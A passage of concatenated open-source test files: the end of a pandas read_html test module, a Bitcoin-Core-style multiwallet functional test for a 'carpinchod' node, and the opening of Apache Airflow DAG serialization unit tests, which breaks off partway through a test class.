<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile(object):
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super(ErrorThread, self).run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
|
wallet_multiwallet.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a carpinchod node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import CARPINCHOTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(CARPINCHOTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Too many levels of symbolic links', 'Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another carpinchod?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another carpinchod?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w2"),
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w1"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import copy
import importlib
import importlib.util
import multiprocessing
import os
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from airflow.exceptions import SerializationError
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.models.xcom import XCom
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import CustomSerializationTimetable, cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_ext": ['.sh', '.bash'],
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_ext": [],
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"schedule_interval": {"__type": "timedelta", "__var": 86400.0},
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
CUSTOM_TIMETABLE_SERIALIZED = {
"__type": "tests.test_utils.timetables.CustomSerializationTimetable",
"__var": {"value": "foo"},
}
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def get_timetable_based_simple_dag(timetable):
"""Create a simple_dag variant that uses timetable instead of schedule_interval."""
dag = collect_dags(["airflow/example_dags"])["simple_dag"]
dag.timetable = timetable
dag.schedule_interval = timetable.summary
return dag
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
@pytest.fixture()
def timetable_plugin(monkeypatch):
"""Patch plugins manager to always and only return our custom timetable."""
from airflow import plugins_manager
monkeypatch.setattr(plugins_manager, "initialize_timetables_plugins", lambda: None)
monkeypatch.setattr(
plugins_manager,
"timetable_classes",
{"tests.test_utils.timetables.CustomSerializationTimetable": CustomSerializationTimetable},
)
class TestStringifiedDAGs:
"""Unit tests for stringified DAGs."""
def setup_method(self):
self.backup_base_hook_get_connection = BaseHook.get_connection
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def teardown_method(self):
BaseHook.get_connection = self.backup_base_hook_get_connection
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
@pytest.mark.parametrize(
"timetable, serialized_timetable",
[
(
cron_timetable("0 0 * * *"),
{
"__type": "airflow.timetables.interval.CronDataIntervalTimetable",
"__var": {"expression": "0 0 * * *", "timezone": "UTC"},
},
),
(
CustomSerializationTimetable("foo"),
CUSTOM_TIMETABLE_SERIALIZED,
),
],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_serialization_to_timetable(self, timetable, serialized_timetable):
"""Verify a timetable-backed schedule_interval is excluded in serialization."""
dag = get_timetable_based_simple_dag(timetable)
serialized_dag = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(serialized_dag)
expected = copy.deepcopy(serialized_simple_dag_ground_truth)
del expected["dag"]["schedule_interval"]
expected["dag"]["timetable"] = serialized_timetable
self.validate_serialized_dag(serialized_dag, expected)
def test_dag_serialization_unregistered_custom_timetable(self):
"""Verify serialization fails without timetable registration."""
dag = get_timetable_based_simple_dag(CustomSerializationTimetable("bar"))
with pytest.raises(SerializationError) as ctx:
SerializedDAG.to_dict(dag)
message = (
"Failed to serialize DAG 'simple_dag': Timetable class "
"'tests.test_utils.timetables.CustomSerializationTimetable' "
"is not registered"
)
assert str(ctx.value) == message
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
